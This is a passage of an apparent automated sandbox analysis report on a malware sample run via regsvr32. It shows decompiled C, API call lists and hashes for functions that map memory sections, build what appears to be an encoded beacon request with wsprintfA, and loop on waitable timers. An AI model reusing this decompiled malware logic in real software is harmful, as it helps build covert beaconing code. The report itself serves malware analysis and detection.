                • NtMapViewOfSection.NTDLL(00000000,000000FF,04BDBF30,00000000,00000000,04BDBF30,00000000,00000002,00000000,?,?,00000000,04BDBF30,000000FF,00000000), ref: 04BD100E
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: SectionView
                • String ID:
                • API String ID: 1323581903-0
                • Opcode ID: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                • Instruction ID: fe0930982ff20fca937887a832bbb51e1ae152f62cce98e252f4c679b306bfcf
                • Opcode Fuzzy Hash: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                • Instruction Fuzzy Hash: 1FF012B690020CFFDB119FA5CC85C9FBBBDEB48344F008869F542D1050E631AE589B60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F4AAF Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON
                Download Yara Rule
                C-Code - Quality: 68%
                			E031F4AAF(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                0x031f4ac1
                0x031f4ac7
                0x031f4ad5
                0x031f4adc
                0x031f4ae1
                0x031f4ae7
                0x00000000
                0x031f4ae8
                0x00000000

                APIs
                • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,031F2FFF,00000002,00000000,?,?,00000000,?,?,031F2FFF,00000000), ref: 031F4ADC
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: SectionView
                • String ID:
                • API String ID: 1323581903-0
                • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                • Instruction ID: a663201441a2a90923f5d9fcbb002bfb9dc27d1680e9f3a2306cbd6520d32306
                • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                • Instruction Fuzzy Hash: 2BF012B990020CBFDB11DFA5CC85C9FBBBDEB48254B104A39B252E1090D6309E488A60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BDD6E3 Relevance: 1.5, APIs: 1, Instructions: 33nativeCOMMON
                Download Yara Rule
                APIs
                • NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,04BEE480), ref: 04BDD6FA
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: InformationProcessQuery
                • String ID:
                • API String ID: 1778838933-0
                • Opcode ID: 846705b9d43df1cb78cfdddca531493c46ae0ebd7efa622a67c85c6b4a277c15
                • Instruction ID: 37677cd1b7e9945d766faa3510584c89b428d8e0a11ed7c8fcb56dca366bd8f3
                • Opcode Fuzzy Hash: 846705b9d43df1cb78cfdddca531493c46ae0ebd7efa622a67c85c6b4a277c15
                • Instruction Fuzzy Hash: 65F058353001259BCB20DE59D884DAFBBBCEB42795B4045D5E984EB251E330FD05CBE0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F74A5 Relevance: 44.0, APIs: 24, Strings: 1, Instructions: 214memorystringCOMMON
                Download Yara Rule

                Control-flow Graph

                C-Code - Quality: 68%
                			E031F74A5(long __eax, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a20, intOrPtr _a24) {
				intOrPtr _v0;
				intOrPtr _v4;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v52;
				void* __ecx;
				void* __edi;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				void* _t37;
				intOrPtr _t38;
				int _t41;
				void* _t42;
				intOrPtr _t46;
				intOrPtr _t47;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t66;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t82;
				int _t85;
				intOrPtr _t87;
				int _t90;
				intOrPtr _t92;
				int _t95;
				intOrPtr* _t97;
				intOrPtr* _t98;
				void* _t99;
				void* _t103;
				void* _t104;
				void* _t105;
				intOrPtr _t106;
				void* _t108;
				int _t109;
				void* _t110;
				void* _t111;
				void* _t113;
				void* _t114;
				void* _t116;

				_t103 = __edx;
				_t29 = __eax;
				_t113 = _a20;
				_v4 = 8;
				if(__eax == 0) {
					_t29 = GetTickCount();
				}
				_t30 =  *0x31fa01c; // 0x8e501c47
				asm("bswap eax");
				_t31 =  *0x31fa018; // 0x3a87c8cd
				asm("bswap eax");
				_t32 =  *0x31fa014; // 0xd8d2f808
				asm("bswap eax");
				_t33 =  *0x31fa010; // 0xeec43f25
				asm("bswap eax");
				_t34 =  *0x31fa2d8; // 0x240d5a8
				_t3 = _t34 + 0x31fb633; // 0x74666f73
				_t109 = wsprintfA(_t113, _t3, 2, 0x3f880, _t33, _t32, _t31, _t30,  *0x31fa030,  *0x31fa008, _t29);
				_t37 = E031F63D2();
				_t38 =  *0x31fa2d8; // 0x240d5a8
				_t4 = _t38 + 0x31fb673; // 0x74707526
				_t41 = wsprintfA(_t109 + _t113, _t4, _t37);
				_t116 = _t114 + 0x38;
				_t110 = _t109 + _t41;
				if(_a24 != 0) {
					_t92 =  *0x31fa2d8; // 0x240d5a8
					_t8 = _t92 + 0x31fb67e; // 0x732526
					_t95 = wsprintfA(_t110 + _t113, _t8, _a24);
					_t116 = _t116 + 0xc;
					_t110 = _t110 + _t95; // executed
				}
				_t42 = E031F4A14(_t99); // executed
				_t104 = _t42;
				if(_t104 != 0) {
					_t87 =  *0x31fa2d8; // 0x240d5a8
					_t10 = _t87 + 0x31fb8cc; // 0x736e6426
					_t90 = wsprintfA(_t110 + _t113, _t10, _t104);
					_t116 = _t116 + 0xc;
					_t110 = _t110 + _t90;
					HeapFree( *0x31fa290, 0, _t104);
				}
				_t105 = E031F3C13();
				if(_t105 != 0) {
					_t82 =  *0x31fa2d8; // 0x240d5a8
					_t12 = _t82 + 0x31fb8d4; // 0x6f687726
					_t85 = wsprintfA(_t110 + _t113, _t12, _t105);
					_t116 = _t116 + 0xc;
					_t110 = _t110 + _t85;
					HeapFree( *0x31fa290, 0, _t105);
				}
				_t106 =  *0x31fa384; // 0x56095b0
				_a24 = E031F29DC(0x31fa00e, _t106 + 4);
				_t46 =  *0x31fa328; // 0x0
				if(_t46 != 0) {
					_t78 =  *0x31fa2d8; // 0x240d5a8
					_t15 = _t78 + 0x31fb8ae; // 0x3d736f26
					_t81 = wsprintfA(_t110 + _t113, _t15, _t46);
					_t116 = _t116 + 0xc;
					_t110 = _t110 + _t81;
				}
				_t47 =  *0x31fa324; // 0x0
				if(_t47 != 0) {
					_t75 =  *0x31fa2d8; // 0x240d5a8
					_t17 = _t75 + 0x31fb885; // 0x3d706926
					wsprintfA(_t110 + _t113, _t17, _t47);
				}
				if(_a24 != 0) {
					_t50 = RtlAllocateHeap( *0x31fa290, 0, 0x800); // executed
					_t108 = _t50;
					if(_t108 != 0) {
						E031F6341(GetTickCount());
						_t54 =  *0x31fa384; // 0x56095b0
						__imp__(_t54 + 0x40);
						asm("lock xadd [eax], ecx");
						_t58 =  *0x31fa384; // 0x56095b0
						__imp__(_t58 + 0x40);
						_t60 =  *0x31fa384; // 0x56095b0
						_t61 = E031F52C4(1, _t103, _t113,  *_t60); // executed
						_t111 = _t61;
						asm("lock xadd [eax], ecx");
						if(_t111 != 0) {
							StrTrimA(_t111, 0x31f92a8);
							_push(_t111);
							_t66 = E031F5F46();
							_a12 = _t66;
							if(_t66 != 0) {
								_t97 = __imp__;
								 *_t97(_t111, _v0);
								 *_t97(_t108, _v4);
								_t98 = __imp__;
								 *_t98(_t108, _v0);
								 *_t98(_t108, _t111);
								_t72 = E031F6BD0(0xffffffffffffffff, _t108, _v24, _v20); // executed
								_v52 = _t72;
								if(_t72 != 0 && _t72 != 0x10d2) {
									E031F51B1();
								}
								HeapFree( *0x31fa290, 0, _v16);
							}
							RtlFreeHeap( *0x31fa290, 0, _t111); // executed
						}
						RtlFreeHeap( *0x31fa290, 0, _t108); // executed
					}
					HeapFree( *0x31fa290, 0, _a16);
				}
				RtlFreeHeap( *0x31fa290, 0, _t113); // executed
				return _a4;
			}





















































                0x031f74a5
                0x031f74a5
                0x031f74ab
                0x031f74b1
                0x031f74b9
                0x031f74bb
                0x031f74bb
                0x031f74c8
                0x031f74d3
                0x031f74d6
                0x031f74e1
                0x031f74e4
                0x031f74e9
                0x031f74ec
                0x031f74f1
                0x031f74f4
                0x031f7500
                0x031f750d
                0x031f750f
                0x031f7515
                0x031f751a
                0x031f7525
                0x031f7527
                0x031f752a
                0x031f7531
                0x031f7533
                0x031f753c
                0x031f7547
                0x031f7549
                0x031f754c
                0x031f754c
                0x031f754e
                0x031f7553
                0x031f7557
                0x031f7559
                0x031f755e
                0x031f756a
                0x031f756c
                0x031f7578
                0x031f757a
                0x031f757a
                0x031f7585
                0x031f7589
                0x031f758b
                0x031f7590
                0x031f759c
                0x031f759e
                0x031f75aa
                0x031f75ac
                0x031f75ac
                0x031f75b2
                0x031f75c5
                0x031f75c9
                0x031f75d0
                0x031f75d3
                0x031f75d8
                0x031f75e3
                0x031f75e5
                0x031f75e8
                0x031f75e8
                0x031f75ea
                0x031f75f1
                0x031f75f4
                0x031f75f9
                0x031f7603
                0x031f7605
                0x031f760d
                0x031f7620
                0x031f7626
                0x031f762a
                0x031f7636
                0x031f763b
                0x031f7644
                0x031f7655
                0x031f7659
                0x031f7662
                0x031f7668
                0x031f7670
                0x031f7675
                0x031f7682
                0x031f7688
                0x031f7694
                0x031f769a
                0x031f769b
                0x031f76a2
                0x031f76a6
                0x031f76ac
                0x031f76b3
                0x031f76ba
                0x031f76c0
                0x031f76c7
                0x031f76cb
                0x031f76d6
                0x031f76dd
                0x031f76e1
                0x031f76ea
                0x031f76ea
                0x031f76fb
                0x031f76fb
                0x031f770a
                0x031f770a
                0x031f7719
                0x031f7719
                0x031f772b
                0x031f772b
                0x031f773a
                0x031f774a

                APIs
                • GetTickCount.KERNEL32 ref: 031F74BB
                • wsprintfA.USER32 ref: 031F7508
                • wsprintfA.USER32 ref: 031F7525
                • wsprintfA.USER32 ref: 031F7547
                • wsprintfA.USER32 ref: 031F756A
                • HeapFree.KERNEL32(00000000,00000000), ref: 031F757A
                • wsprintfA.USER32 ref: 031F759C
                • HeapFree.KERNEL32(00000000,00000000), ref: 031F75AC
                • wsprintfA.USER32 ref: 031F75E3
                • wsprintfA.USER32 ref: 031F7603
                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 031F7620
                • GetTickCount.KERNEL32 ref: 031F7630
                • RtlEnterCriticalSection.NTDLL(05609570), ref: 031F7644
                • RtlLeaveCriticalSection.NTDLL(05609570), ref: 031F7662
                  • Part of subcall function 031F52C4: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7691C740,?,?,031F7675,?,056095B0), ref: 031F52EF
                  • Part of subcall function 031F52C4: lstrlen.KERNEL32(?,?,?,031F7675,?,056095B0), ref: 031F52F7
                  • Part of subcall function 031F52C4: strcpy.NTDLL ref: 031F530E
                  • Part of subcall function 031F52C4: lstrcat.KERNEL32(00000000,?), ref: 031F5319
                  • Part of subcall function 031F52C4: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,031F7675,?,056095B0), ref: 031F5336
                • StrTrimA.SHLWAPI(00000000,031F92A8,?,056095B0), ref: 031F7694
                  • Part of subcall function 031F5F46: lstrlen.KERNEL32(05609B10,00000000,00000000,7691C740,031F76A0,00000000), ref: 031F5F56
                  • Part of subcall function 031F5F46: lstrlen.KERNEL32(?), ref: 031F5F5E
                  • Part of subcall function 031F5F46: lstrcpy.KERNEL32(00000000,05609B10), ref: 031F5F72
                  • Part of subcall function 031F5F46: lstrcat.KERNEL32(00000000,?), ref: 031F5F7D
                • lstrcpy.KERNEL32(00000000,?), ref: 031F76B3
                • lstrcpy.KERNEL32(00000000,00000000), ref: 031F76BA
                • lstrcat.KERNEL32(00000000,?), ref: 031F76C7
                • lstrcat.KERNEL32(00000000,00000000), ref: 031F76CB
                • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 031F76FB
                • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 031F770A
                • RtlFreeHeap.NTDLL(00000000,00000000,?,056095B0), ref: 031F7719
                • HeapFree.KERNEL32(00000000,00000000), ref: 031F772B
                • RtlFreeHeap.NTDLL(00000000,?), ref: 031F773A
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeavestrcpy
                • String ID: Ut
                • API String ID: 628443468-8415677
                • Opcode ID: 5533b1c1465f54acec5314ae82691b8c77dd8a64086782cd80d2eb811f313f99
                • Instruction ID: 0616a21edb368157b263365b0d393092fde72851eaaf71fe5670a5ebf52e5d11
                • Opcode Fuzzy Hash: 5533b1c1465f54acec5314ae82691b8c77dd8a64086782cd80d2eb811f313f99
                • Instruction Fuzzy Hash: C9716872200204AFC719FB64EC88FA677A8FF4C350F190514FA4DD6264DB2AE8959F74
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F541F Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 151timememoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 142 31f541f-31f5451 memset CreateWaitableTimerA 143 31f5457-31f54b0 _allmul SetWaitableTimer WaitForMultipleObjects 142->143 144 31f55d2-31f55d8 GetLastError 142->144 146 31f553a-31f5540 143->146 147 31f54b6-31f54b9 143->147 145 31f55dc-31f55e6 144->145 148 31f5541-31f5545 146->148 149 31f54bb call 31f5cf6 147->149 150 31f54c4 147->150 151 31f5547-31f5549 148->151 152 31f5555-31f5559 148->152 155 31f54c0-31f54c2 149->155 154 31f54ce 150->154 151->152 152->148 156 31f555b-31f5565 CloseHandle 152->156 157 31f54d2-31f54d7 154->157 155->150 155->154 156->145 158 31f54ea-31f5517 call 31f7253 157->158 159 31f54d9-31f54e0 157->159 163 31f5519-31f5524 158->163 164 31f5567-31f556c 158->164 159->158 160 31f54e2 159->160 160->158 163->157 167 31f5526-31f5531 call 31f611c 163->167 165 31f556e-31f5574 164->165 166 31f558b-31f5593 164->166 165->146 168 31f5576-31f5589 call 31f51b1 165->168 169 31f5599-31f55c7 _allmul SetWaitableTimer WaitForMultipleObjects 166->169 173 31f5536 167->173 168->169 169->157 172 31f55cd 169->172 172->146 173->146
                C-Code - Quality: 83%
                			E031F541F(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				struct %anon52 _v124;
				long _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				struct %anon52 _t66;
				intOrPtr _t68;
				void* _t69;
				void* _t73;
				signed int _t74;
				void* _t76;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t76 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x31fa298);
					_v76 = 0;
					_v80 = 0;
					L031F807C();
					_v84.LowPart = _t46;
					_v80 = _t76;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0x31fa2c4; // 0x2bc
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x31fa2a4 = 5;
						} else {
							_t69 = E031F5CF6(_t76); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0x31fa2b8 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t74 = _v104.LowPart;
						_t58 = _t74 << 4;
						_t78 = _t89 + (_t74 << 4) + 0x38;
						_t75 = _t74 + 1;
						_v92.LowPart = _t74 + 1;
						_t61 = E031F7253( &_v96, _t75, _t78, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
						_v124 = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v92;
						_t97 = _t66 - 3;
						_v104.LowPart = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_t68 = E031F611C(_t75, _t97,  &_v72, _a4, _a8); // executed
							_v124.HighPart = _t68;
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x31fa29c);
							goto L21;
						} else {
							__eflags =  *0x31fa2a0; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E031F51B1();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x31fa2a0);
								L21:
								L031F807C();
								_v104.LowPart = _t61;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								__eflags = _t65;
								_v128 = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t73 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							RtlFreeHeap( *0x31fa290, 0, _t54); // executed
						}
						_t82 =  &(_t82[4]);
						_t73 = _t73 - 1;
					} while (_t73 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}

































                0x031f541f
                0x031f5435
                0x031f5439
                0x031f543e
                0x031f5445
                0x031f544d
                0x031f5451
                0x031f55d8
                0x031f5457
                0x031f5457
                0x031f5459
                0x031f545e
                0x031f545f
                0x031f5465
                0x031f5469
                0x031f546d
                0x031f547b
                0x031f5489
                0x031f548d
                0x031f548f
                0x031f549c
                0x031f54a8
                0x031f54ac
                0x031f54b0
                0x031f54b9
                0x031f54c4
                0x031f54c4
                0x031f54bb
                0x031f54bb
                0x031f54c2
                0x00000000
                0x00000000
                0x031f54c2
                0x031f54ce
                0x00000000
                0x031f54d2
                0x031f54d7
                0x031f54e2
                0x031f54e2
                0x031f54ea
                0x031f54f0
                0x031f54f8
                0x031f5501
                0x031f5508
                0x031f550c
                0x031f5513
                0x031f5517
                0x00000000
                0x00000000
                0x031f5519
                0x031f551d
                0x031f5520
                0x031f5524
                0x00000000
                0x031f5526
                0x031f5531
                0x031f5536
                0x031f5536
                0x00000000
                0x031f5567
                0x031f5567
                0x031f556c
                0x031f558b
                0x031f558d
                0x031f5592
                0x031f5593
                0x00000000
                0x031f556e
                0x031f556e
                0x031f5574
                0x00000000
                0x031f5576
                0x031f5576
                0x031f557b
                0x031f557d
                0x031f5582
                0x031f5583
                0x031f5599
                0x031f5599
                0x031f55a1
                0x031f55af
                0x031f55b3
                0x031f55bf
                0x031f55c1
                0x031f55c3
                0x031f55c7
                0x00000000
                0x031f55cd
                0x00000000
                0x031f55cd
                0x031f55c7
                0x031f5574
                0x00000000
                0x031f556c
                0x031f553a
                0x031f553c
                0x031f5540
                0x031f5541
                0x031f5541
                0x031f5545
                0x031f554f
                0x031f554f
                0x031f5555
                0x031f5558
                0x031f5558
                0x031f555f
                0x031f555f
                0x031f55e6
                0x00000000

                APIs
                • memset.NTDLL ref: 031F5439
                • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 031F5445
                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 031F546D
                • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 031F548D
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,031F365E,?), ref: 031F54A8
                • RtlFreeHeap.NTDLL(00000000,00000000,?,?,?,?,?,?,?,?,?,?,031F365E,?,00000000), ref: 031F554F
                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,031F365E,?,00000000,?,?), ref: 031F555F
                • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 031F5599
                • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 031F55B3
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 031F55BF
                  • Part of subcall function 031F5CF6: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,056093E0,00000000,?,74E5F710,00000000,74E5F730), ref: 031F5D45
                  • Part of subcall function 031F5CF6: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05609418,?,00000000,30314549,00000014,004F0053,056093D4), ref: 031F5DE2
                  • Part of subcall function 031F5CF6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,031F54C0), ref: 031F5DF4
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,031F365E,?,00000000,?,?), ref: 031F55D2
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                • String ID: Ut
                • API String ID: 3521023985-8415677
                • Opcode ID: 1369241b43a494826b0ca86956b7467d84888805c2054b828215beaa2609c7bf
                • Instruction ID: 4878bf6244e030d291e0ed1d4061ae03c4c10d920a10d77b9d8009f576e191a8
                • Opcode Fuzzy Hash: 1369241b43a494826b0ca86956b7467d84888805c2054b828215beaa2609c7bf
                • Instruction Fuzzy Hash: 785168B1508310AFC714EF159C449ABBBEEEF8E364F144A1AFAA9C2190D771C544CFA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BC609C Relevance: 21.1, APIs: 14, Instructions: 126memorysynchronizationCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 175 4bc609c-4bc60ad 176 4bc60af 175->176 177 4bc6101-4bc610c 175->177 180 4bc60af call 4bc6220 176->180 178 4bc610e call 4bc6584 177->178 179 4bc6113-4bc6125 call 4bcef26 177->179 178->179 186 4bc6136-4bc613d 179->186 187 4bc6127-4bc6134 ReleaseMutex CloseHandle 179->187 183 4bc60b4 call 4bd8e5e 180->183 188 4bc60b9-4bc60bb 183->188 189 4bc614e-4bc615b SleepEx 186->189 190 4bc613f-4bc614c ResetEvent CloseHandle 186->190 187->186 191 4bc60c1-4bc60ce SleepEx 188->191 189->189 193 4bc615d 189->193 190->189 191->191 192 4bc60d0-4bc60d7 191->192 195 4bc60ed-4bc60ff RtlDeleteCriticalSection * 2 192->195 196 4bc60d9-4bc60df 192->196 194 4bc6162-4bc616f SleepEx 193->194 197 4bc6178-4bc617f 194->197 198 4bc6171-4bc6176 194->198 195->177 196->195 199 4bc60e1-4bc60e8 call 4bc57e0 196->199 200 4bc6190-4bc6197 197->200 201 4bc6181-4bc618a HeapFree 197->201 198->194 198->197 199->195 203 4bc619f-4bc61a5 200->203 204 4bc6199-4bc619a call 4be4177 200->204 201->200 206 4bc61b6-4bc61bd 203->206 207 4bc61a7-4bc61ae 203->207 204->203 209 4bc61bf-4bc61c0 RtlRemoveVectoredExceptionHandler 206->209 210 4bc61c6-4bc61cc 206->210 207->206 208 4bc61b0-4bc61b2 207->208 208->206 209->210 211 4bc61ce call 4bd0bbd 210->211 212 4bc61d3 210->212 211->212 213 4bc61d8-4bc61e5 SleepEx 212->213 215 4bc61ee-4bc61f7 213->215 216 4bc61e7-4bc61ec 213->216 217 4bc620f-4bc621f LocalFree 215->217 218 4bc61f9-4bc61fe 215->218 216->213 216->215 218->217 219 4bc6200 218->219 220 4bc6203-4bc620d CloseHandle 219->220 220->217 220->220
                APIs
                • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,04BCE039), ref: 04BC60C5
                • RtlDeleteCriticalSection.NTDLL(04BEE460), ref: 04BC60F8
                • RtlDeleteCriticalSection.NTDLL(04BEE480), ref: 04BC60FF
                • ReleaseMutex.KERNEL32(000002B4,00000000,?,?,?,04BCE039), ref: 04BC6128
                • CloseHandle.KERNEL32(?,?,04BCE039), ref: 04BC6134
                • ResetEvent.KERNEL32(00000000,00000000,?,?,?,04BCE039), ref: 04BC6140
                • CloseHandle.KERNEL32(?,?,04BCE039), ref: 04BC614C
                • SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,04BCE039), ref: 04BC6152
                • SleepEx.KERNEL32(00000064,00000001,?,?,04BCE039), ref: 04BC6166
                • HeapFree.KERNEL32(00000000,00000000,?,?,04BCE039), ref: 04BC618A
                • RtlRemoveVectoredExceptionHandler.NTDLL(04C005B8), ref: 04BC61C0
                • SleepEx.KERNEL32(00000064,00000001,?,?,04BCE039), ref: 04BC61DC
                • CloseHandle.KERNEL32(0624F048,?,?,04BCE039), ref: 04BC6205
                • LocalFree.KERNEL32(?,?,04BCE039), ref: 04BC6215
                  • Part of subcall function 04BC6220: GetVersion.KERNEL32(?,?,74E5F720,?,04BC60B4,00000000,?,?,?,04BCE039), ref: 04BC6244
                  • Part of subcall function 04BC6220: GetModuleHandleA.KERNEL32(?,062497B5,?,74E5F720,?,04BC60B4,00000000,?,?,?,04BCE039), ref: 04BC6261
                  • Part of subcall function 04BC6220: GetProcAddress.KERNEL32(00000000), ref: 04BC6268
                  • Part of subcall function 04BD8E5E: RtlEnterCriticalSection.NTDLL(04BEE480), ref: 04BD8E68
                  • Part of subcall function 04BD8E5E: RtlLeaveCriticalSection.NTDLL(04BEE480), ref: 04BD8EA4
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: CriticalHandleSectionSleep$Close$DeleteFree$AddressEnterEventExceptionHandlerHeapLeaveLocalModuleMutexProcReleaseRemoveResetVectoredVersion
                • String ID:
                • API String ID: 1765366784-0
                • Opcode ID: 48f087547da50a236c1a54d6924c7a1f499df3d180d422d0d6cadacfa738c629
                • Instruction ID: 5c9a2b6d2ce411c2aa7396bcf59676d606c03cb73368db5e0a53e3672a118133
                • Opcode Fuzzy Hash: 48f087547da50a236c1a54d6924c7a1f499df3d180d422d0d6cadacfa738c629
                • Instruction Fuzzy Hash: 81417F31A402119BEB20AF76ECC5F1577A9EB84B45F0500AAF500DF192DB3AFC60CA72
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F5F8B Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 102memoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
